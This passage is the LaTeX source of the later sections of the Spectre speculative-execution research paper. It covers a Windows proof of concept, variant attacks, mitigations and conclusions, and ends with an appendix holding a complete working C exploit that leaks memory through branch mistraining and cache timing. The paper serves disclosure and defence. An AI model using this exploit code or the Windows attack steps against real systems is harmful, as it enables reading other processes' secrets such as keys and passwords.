Still, this simplifies branch predictor mistraining because this allows gadgets to return cleanly during mistraining, regardless of what instructions follow the gadget.
\end{itemize}

Although testing was performed using 32-bit applications on Windows 8, 64-bit modes and other versions of Windows and Linux shared libraries are likely to work similarly. 
Kernel mode testing has not been performed, but the combination of address truncation/hashing in the history matching and trainability via jumps to illegal destinations suggest that attacks against kernel mode may be possible. 
The effect on other kinds of jumps, such as interrupts and interrupt returns, is also unknown.  

\subsection{Example Implementation on Windows}

As a proof-of-concept, a simple program was written that generates a random key then does an infinite loop that calls \texttt{Sleep(0)}, loads the first bytes of a file (\eg as a header), calls Windows crypto functions to compute the SHA-1 hash of (key \mbox{$||$} header), and prints the hash whenever the header changes. 
When this program is compiled with optimization, the call to \texttt{Sleep()} gets made with file data in registers \texttt{ebx} and \texttt{edi}. 
No special effort was taken to cause this; as noted above, function calls with adversary-chosen values in registers are common, although the specifics (such as what values appear in which registers) are often determined by compiler optimizations and therefore difficult to predict from source code. 
The test program did not include any memory flushing operations or other adaptations to help the attacker.

The first step was to identify a gadget which, when speculatively executed with adversary-controlled values for \texttt{ebx} and \texttt{edi}, would reveal attacker-chosen memory from the victim process. 
As noted above, this gadget must be in an executable page within the working set of the victim process.  (On Windows, some pages in DLLs are mapped in the address space but require a soft page fault before becoming part of the working set.)  A simple program was written that saved its own working set pages, which are largely representative of the working set contents common to all applications. 
This output was then searched for potential gadgets, yielding multiple usable options for \texttt{ebx} and \texttt{edi} (as well as for other pairs of registers). 
Of these, the following byte sequence which appears in \texttt{ntdll.dll} in both Windows 8 and Windows 10 was (rather arbitrarily) chosen

\begin{verbatim}
    13 BC 13 BD 13 BE 13      
    12 17                	  
\end{verbatim}

\noindent which, when executed, corresponds to the following instructions:

\begin{verbatim}
    adc  edi,dword ptr [ebx+edx+13BE13BDh]
    adc  dl,byte ptr [edi]
\end{verbatim}

\noindent Speculative execution of this gadget with attacker-controlled \texttt{ebx} and \texttt{edi} allows an adversary to read the victim's memory. 
If the adversary chooses $\texttt{ebx}=m - \texttt{0x13BE13BD} - \texttt{edx}$, where $\texttt{edx}=3$ for the sample program (as determined by running in a debugger), the first instruction reads the 32-bit value from address $m$ and adds this onto \texttt{edi}.  (In the victim, the carry flag happens to be clear, so no additional carry is added.)  Since \texttt{edi} is also controlled by the attacker, speculative execution of the second instruction will read (and bring into the cache) the memory whose address is the sum of the 32-bit value loaded from address $m$ and the attacker-chosen \texttt{edi}. 
Thus, the attacker can map the $2^{32}$ possible memory values onto smaller regions, which can then be analyzed via flush-and-probe to solve for memory bytes. 
For example, if the bytes at $m+2$ and $m+3$ are known, the value in \texttt{edi} can cancel out their contribution and map the second read to a 64KB region which can be probed easily via flush-and-probe.

The operation chosen for branch mistraining was the first instruction of the \texttt{Sleep()} function, which is a jump of the form ``\texttt{jmp dword ptr ds:[76AE0078h]}'' (where both the location of the jump destination and the destination itself change per reboot due to ASLR). 
This jump instruction was chosen because it appeared that the attack process could \texttt{clflush} the destination address, although (as noted later) this did not work. 
In addition, unlike a return instruction, there were no adjacent operations might un-evict the return address (\eg by accessing the stack) and limit speculative execution.

In order to get the victim to speculatively execute the gadget, the memory location containing the jump destination needs to be uncached, and the  branch predictor needs be mistrained to send speculative execution to the gadget. 
This was accomplished as follows:

\begin{itemize}
\item Simple pointer operations were used to locate the indirect jump at the entry point for \texttt{Sleep()} and the memory location holding the destination for the jump.  
\item A search of \texttt{ntdll.dll} in RAM was performed to find the gadget, and some shared DLL memory was chosen for performing flush-and-probe detections.
\item To prepare for branch predictor mistraining, the memory page containing the destination for the jump destination was made writable (via copy-on-write) and modified to change the jump destination to the gadget address. Using the same method, a \texttt{ret 4} instruction was written at the location of the gadget.
These changes but do not affect the memory seen by the victim (which is running in a separate process), but makes it so that the attacker's calls 
to \texttt{Sleep()} will jump to the gadget address (mistraining the branch predictor) then immediately return.  
\item A separate thread was launched to repeatedly evict the victim's memory address containing the jump destination.  (Although the memory containing the destination has the same virtual address for the attacker and victim, they appear to have different physical memory -- perhaps because of a prior copy-on-write.)  Eviction was done using the same general method as the JavaScript example, \ie by allocating a large table and using a pair of indexes to read addresses at 4096-byte multiples of the address to evict.
\item Thread(s) were launched to mistrain the branch predictor. 
These use a $2^{20}$ byte (1MB) executable memory region filled with 0xC3 bytes (\texttt{ret} instructions. 
The victim's pattern of jump destinations is mapped to addresses in this area, with an adjustment for ASLR found during an initial training process (see below). 
The mistraining threads run a loop which pushes the mapped addresses onto the stack such that an initiating \texttt{ret} instruction 
results in the processor performing a series of return instructions in the memory region, then branches to the gadget 
address, then (because of the \texttt{ret} placed there) immediately returns back to the loop. 
To encourage hyperthreading of the mistraining thread and the victim, the eviction and probing threads set their CPU 
affinity to share a core (which they keep busy), leaving the victim and mistraining threads to share the rest of the cores.
\item During the initial phase of getting the branch predictor mistraining working, the victim is supplied with input that, when the victim calls \texttt{Sleep()}, $[\texttt{ebx}+3h+13BE13BDh]$ will read a DLL location whose value is known and \texttt{edi} is chosen such 
that the second operation will point to another location that can be monitored easily. 
With these settings, the branch training sequence is adjusted to compensate for the victim's ASLR. 
\item Finally, once an effective mimic jump sequence is found, the attacker can read through the victim's 
address space to locate and read victim data regions to locate values (which can move due to ASLR) by 
controlling the values of \texttt{ebx} and \texttt{edi} and using flush-and-probe on the DLL region selected above.
\end{itemize}

The completed attack allows the reading of memory from the victim process.

\section{Variations}
So far we have demonstrated attacks that leverage changes in the state of the cache that occur during speculative execution.
Future processors (or existing processors with different microcode) may behave differently, \eg if measures are taken to
prevent speculatively executed code from modifying the cache state.  In this section, we examine
potential variants of the attack, including how speculative execution could affect the state of other microarchitectural components.
In general, the Spectre attack can be combined with other microarchitectural attacks.
In this section we explore potential combinations and conclude that virtually any observable effect
of speculatively executed code can potentially lead to leaks of sensitive information.
Although the following techniques are not needed for the processors tested (and have not been implemented), 
it is essential to understand potential variations when designing or evaluating mitigations.

\paul {Make sure this is all covered in the variations section: Cache state is only one of multiple avenues for exploiting speculative execution. 
For example, the utilization of resources (such as memory buses, arithmetic units, virtual registers, etc.) that affect the timing of other operations, modification of other state (such as branch predictors, performance registers, DRAM row select, etc.), and conventional side channel emanations (such as EM/power) can also leak information from speculative execution to an adversary.}



\parhead{Evict+Time}
The Evict+Time attack~\cite{RSA:OsvShaTro06} works by measuring the timing of operations that depend on
the state of the cache.
This technique can be adapted to use Spectre as follows. 
Consider the code:

\begin{verbatim}
    if (false but mispredicts as true)
       read array1[R1]
    read [R2]
\end{verbatim}

Suppose register R1 contains  a secret value. 
If the speculatively executed memory read of \texttt{array1[R1]} is a cache hit, then nothing will go on the memory bus and the 
read from \texttt{[R2]} will initiate quickly. 
If the read of \texttt{array1[R1]} is a cache miss, then the second read may take longer, resulting in different timing for the victim thread.  
In addition, other components in the system that can access memory (such as other processors) may be able to the 
presence of activity on the memory bus or other effects of the memory read (e.g.\ changing the DRAM row address select).
We note that this attack, unlike those we have implemented, would work 
even if speculative execution does not modify the contents of the cache.
All that is required is that the state of the cache affects the timing of speculatively executed code
or some other property that ultimately becomes is visible to the attacker.

\parhead{Instruction Timing}
Spectre vulnerabilities do not necessarily need to involve caches.  
Instructions whose timing depends on the values of the operands may
leak information on the operands~\cite{SP:AKMJLS15}.
In the following example, the multiplier is occupied by the speculative execution of \texttt{multiply R1, R2}.
The timing of when the multiplier becomes available for \texttt{multiply R3, R4} (either for out-of-order
execution or after the misprediction is recognized) could be affected by the timing of the first
multiplication, revealing information about \texttt{R1} and \texttt{R2}. 

\begin{verbatim}
    if (false but mispredicts as true)
       multiply R1, R2
    multiply R3, R4
\end{verbatim}

\parhead{Contention on the Register File}
Suppose the CPU has a registers file with a finite number of registers available for storing checkpoints for speculative execution.  In the following example, if \texttt{condition on R1} in the second `if' is true, then an extra speculative execution checkpoint will be created than if \texttt{condition on R1} is false.  If an adversary can detect this checkpoint, e.g., if speculative execution of code in hyperthreads is reduced due to a shortage of storage, this reveals information about \texttt{R1}.

\begin{verbatim}
    if (false but mispredicts as true)
       if (condition on R1)
          if (condition)
\end{verbatim}

\parhead{Variations on Speculative Execution}
Even code that contains no conditional branches can potentially be at risk.  For example, 
consider the case where an attacker wishes to determine whether \texttt{R1} contains an attacker-chosen value $X$ or some other value.  (The ability to make such determinations is sufficient to break some cryptographic implementations.)  The attacker mistrains the branch predictor such that, after an interrupt occurs, and the interrupt return mispredicts to an instruction that reads memory \texttt{[R1]}.  The attacker then chooses $X$ to correspond to a memory address suitable for Flush+Reload, revealing whether \texttt{R1}$=X$.

\parhead{Leveraging arbitrary observable effects}
Virtually any observable effect of speculatively executed code can be leveraged to leak sensitive information.

Consider the example in \cref{lst:basic_example} where the operation after the access to \texttt{array1}/\texttt{array2}
is observable when executed speculatively.  In this case, the timing of when the observable operation begins will depend on 
the cache status of \texttt{array2}.

\begin{verbatim}
  if (x < array1_size) {
    y = array2[array1[x] * 256];
    // do something using Y that is 
    // observable when speculatively executed
  }
\end{verbatim}

\section{Mitigation Options}

The conditional branch vulnerability can be mitigated if speculative execution can be halted on potentially-sensitive execution paths. 
On Intel x86 processors, ``serializing instructions'' appear to do this in practice, although their architecturally-guaranteed behavior is to ``constrain speculative execution because the results of speculatively executed instructions are discarded''~\cite{IntelArchManualVol3Section83}.
This is different from ensuring that speculative execution will not occur or leak information. 
As a result, serialization instructions may not be an effective countermeasure on all processors or system configurations. 
In addition, of the three user-mode serializing instructions listed by Intel, only \texttt{cpuid} can be used in normal code, and it destroys many registers. 
The \texttt{mfence} and \texttt{lfence} (but not \texttt{sfence}) instructions also appear to work, with the added benefit that they do not destroy register contents. 
Their behavior with respect to speculative execution is not defined, however, so they may not work in all CPUs or system configurations.\footnote{After reviewing an initial draft of this paper, Intel engineers indicated that the definition of \texttt{lfence} will be revised to specify that it blocks speculative execution.}
Testing on non-Intel CPUs has not been performed. 
While simple delays could theoretically work, they would need to be very long since speculative execution routinely stretches nearly 200 instructions ahead of a cache miss, and much greater distances may occur.

The problem of inserting speculative execution blocking instructions is challenging. 
Although a compiler could easily insert such instructions comprehensively (\ie at both the instruction following each conditional branch and its destination), this would severely degrade performance. 
Static analysis techniques might be able to eliminate some of these checks. 
Insertion in security-critical routines alone is not sufficient, since the vulnerability can leverage non-security-critical code in the same process. 
In addition, code needs to be recompiled, presenting major practical challenges for legacy applications.

Indirect branch poisoning is even more challenging to mitigate in software. 
It might be possible to disable hyperthreading and flush branch prediction state during context switches, although there does not appear to be any architecturally-defined method for doing this~\cite{GeYH17}. 
This also may not address all cases, such as \texttt{switch()} statements where inputs to one case may be hazardous in another.  (This situation is likely to occur in interpreters and parsers.)  In addition, the applicability of speculative execution following other forms of jumps, such as those involved in interrupt handling, are also currently unknown and likely to vary among processors.  

The practicality of microcode fixes for existing processors is also unknown. 
It is possible that a patch could disable speculative execution or prevent speculative memory reads, but this would bring a significant performance penalty. 
Buffering speculatively-initiated memory transactions separately from the cache until speculative execution is committed is not a sufficient countermeasure, since the timing of speculative execution can also reveal information. 
For example, if speculative execution uses a sensitive value to form the address for a memory read, the cache status of that read will affect the timing of the next speculative operation. 
If the timing of that operation can be inferred, \eg because it affects a resource such as a bus or ALU used by other threads, the memory is compromised. 
More broadly, potential countermeasures limited to the memory cache are likely to be insufficient, since there are other ways that speculative execution can leak information. 
For example, timing effects from memory bus contention, DRAM row address selection status, availability of virtual registers, ALU activity, and the state of the branch predictor itself need to be considered. 
Of course, speculative execution will also affect conventional side channels, such as power and EM.

As a result, any software or microcode countermeasure attempts should be viewed as stop-gap measures pending further research.

\section{Conclusions and Future Work}

Software isolation techniques are extremely widely deployed under a variety of names, including sandboxing, process separation, containerization, memory safety, proof-carrying code. 
A fundamental security assumption underpinning all of these is that the CPU will faithfully execute software, including its safety checks. 
Speculative execution unfortunately violates this assumption in ways that allow adversaries to violate the secrecy (but not integrity) of memory and register contents. 
As a result, a broad range of software isolation approaches are impacted. 
In addition, existing countermeasures to cache attacks for cryptographic implementations consider only the instructions `officially' executed, not effects due to speculative execution, and are also impacted.

The feasibility of exploitation depends on a number of factors, including aspects of the victim CPU and software and the adversary's ability to interact with the victim. 
While network-based attacks are conceivable, situations where an attacker can run code on the same CPU as the victim pose the primary risk. 
In these cases, exploitation may be straightforward, while other attacks may depend on minutiae such as choices made by the victim's compiler in allocating registers and memory. 
Fuzzing tools can likely be adapted by adversaries to find vulnerabilities in current software.

As the attack involves currently-undocumented hardware effects, exploitability of a given software program may vary among processors. 
For example, some indirect branch redirection tests worked on Skylake but not on Haswell. 
AMD states that its Ryzen processors have ``an artificial intelligence neural network that learns to predict what future pathway an application will take based on past runs''~\cite{AMDNeural, AMDNeuralVideo}, implying even more complex speculative behavior. 
As a result, while the stop-gap countermeasures described in the previous section may help limit practical exploits in the short term, there is currently no way to know whether a particular code construction is, or is not, safe across today's processors -- much less future designs.  

A great deal of work lies ahead. 
Software security fundamentally depends on having a clear common understanding between hardware and software developers as to what information CPU implementations are (and are not) permitted to expose from computations. 
As a result, long-term solutions will require that instruction set architectures be updated to include clear guidance about the security properties of the processor, and CPU implementations will need to be updated to conform.

More broadly, there are trade-offs between security and performance. 
The vulnerabilities in this paper, as well as many others, arise from a longstanding focus in the technology industry on maximizing performance. 
As a result, processors, compilers, device drivers, operating systems, and numerous other critical components have evolved compounding layers of complex optimizations that introduce security risks. 
As the costs of insecurity rise, these design choices need to be revisited, and in many cases alternate implementations optimized for security will be required.

\section{Acknowledgments}
This work partially overlaps with independent work by Google Project Zero.

We would like to thank Intel for their professional handling of this issue through communicating a clear timeline and connecting all involved researchers. We would also thank ARM, Qualcomm, and other vendors for their fast response upon disclosing the issue. 

\paul{Please indicate who is tied to the grants -- not sure if I got this correct.}

Daniel Gruss, Moritz Lipp, Stefan Mangard and Michael Schwarz were supported by the European Research Council (ERC) under the European Union’s Horizon 2020 research and innovation programme (grant agreement No 681402).

Daniel Genkin was supported by NSF awards \#1514261 and \#1652259, financial assistance award 70NANB15H328 from the U.S. Department of Commerce, National Institute of Standards and Technology, the 2017-2018 Rothschild Postdoctoral Fellowship, and the Defense Advanced Research Project Agency (DARPA) under Contract \#FA8650-16-C-7622.

%
%
%

{\footnotesize \bibliographystyle{acm}
\bibliography{abbrev1,crypto,additional,references}}

\FloatBarrier
\appendix
\onecolumn

\section{Spectre Example Implementation}\label{app:code}

\begin{lstlisting}[language=C,style=customc,caption={A demonstration reading memory using a Spectre attack on x86.},breaklines=true,label={lst:appendix_example}]
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h>        /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h>     /* for rdtscp and clflush */
#endif

/********************************************************************
Victim code.
********************************************************************/
unsigned int array1_size = 16;
uint8_t unused1[64];
uint8_t array1[160] = { 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16 };
uint8_t unused2[64]; 
uint8_t array2[256 * 512];

char *secret = "The Magic Words are Squeamish Ossifrage.";

uint8_t temp = 0;  /* Used so compiler won't optimize out victim_function() */

void victim_function(size_t x) {
	if (x < array1_size) {
		temp &= array2[array1[x] * 512];
	}
}


/********************************************************************
Analysis code
********************************************************************/
#define CACHE_HIT_THRESHOLD (80)  /* assume cache hit if time <= threshold */

/* Report best guess in value[0] and runner-up in value[1] */
void readMemoryByte(size_t malicious_x, uint8_t value[2], int score[2]) {
	static int results[256];
	int tries, i, j, k, mix_i, junk = 0;
	size_t training_x, x;
	register uint64_t time1, time2;
	volatile uint8_t *addr;

	for (i = 0; i < 256; i++)
		results[i] = 0;
	for (tries = 999; tries > 0; tries--) {

		/* Flush array2[256*(0..255)] from cache */
		for (i = 0; i < 256; i++)
			_mm_clflush(&array2[i * 512]);  /* intrinsic for clflush instruction */

		/* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
		training_x = tries % array1_size;
		for (j = 29; j >= 0; j--) {
			_mm_clflush(&array1_size);
			for (volatile int z = 0; z < 100; z++) {}  /* Delay (can also mfence) */

			/* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
			/* Avoid jumps in case those tip off the branch predictor */
			x = ((j % 6) - 1) & ~0xFFFF;   /* Set x=FFF.FF0000 if j%6==0, else x=0 */
			x = (x | (x >> 16));           /* Set x=-1 if j&6=0, else x=0 */
			x = training_x ^ (x & (malicious_x ^ training_x));
			
			/* Call the victim! */
			victim_function(x);
		}

		/* Time reads. Order is lightly mixed up to prevent stride prediction */
		for (i = 0; i < 256; i++) {
			mix_i = ((i * 167) + 13) & 255;
			addr = &array2[mix_i * 512];
			time1 = __rdtscp(&junk);            /* READ TIMER */
			junk = *addr;                       /* MEMORY ACCESS TO TIME */
			time2 = __rdtscp(&junk) - time1;    /* READ TIMER & COMPUTE ELAPSED TIME */
			if (time2 <= CACHE_HIT_THRESHOLD && mix_i != array1[tries % array1_size])
				results[mix_i]++;  /* cache hit - add +1 to score for this value */
		}

		/* Locate highest & second-highest results results tallies in j/k */
		j = k = -1;
		for (i = 0; i < 256; i++) {
			if (j < 0 || results[i] >= results[j]) {
				k = j;
				j = i;
			} else if (k < 0 || results[i] >= results[k]) {
				k = i;
			}
		}
		if (results[j] >= (2 * results[k] + 5) || (results[j] == 2 && results[k] == 0))
			break;  /* Clear success if best is > 2*runner-up + 5 or 2/0) */
	}
	results[0] ^= junk;  /* use junk so code above won't get optimized out*/
	value[0] = (uint8_t)j;
	score[0] = results[j];
	value[1] = (uint8_t)k;
	score[1] = results[k];
}

int main(int argc, const char **argv) {
	size_t malicious_x=(size_t)(secret-(char*)array1);   /* default for malicious_x */
	int i, score[2], len=40;
	uint8_t value[2];

	for (i = 0; i < sizeof(array2); i++)
		array2[i] = 1;    /* write to array2 so in RAM not copy-on-write zero pages */
	if (argc == 3) {
		sscanf(argv[1], "%p", (void**)(&malicious_x));
		malicious_x -= (size_t)array1;  /* Convert input value into a pointer */
		sscanf(argv[2], "%d", &len);
	}
	
	printf("Reading %d bytes:\n", len);
	while (--len >= 0) {
		printf("Reading at malicious_x = %p... ", (void*)malicious_x);
		readMemoryByte(malicious_x++, value, score);
		printf("%s: ", (score[0] >= 2*score[1] ? "Success" : "Unclear"));
		printf("0x%02X='%c' score=%d    ", value[0], 
            (value[0] > 31 && value[0] < 127 ? value[0] : '?'), score[0]);
		if (score[1] > 0)
			printf("(second best: 0x%02X score=%d)", value[1], score[1]);
		printf("\n");
	}
	return (0);
}
\end{lstlisting}

\end{document}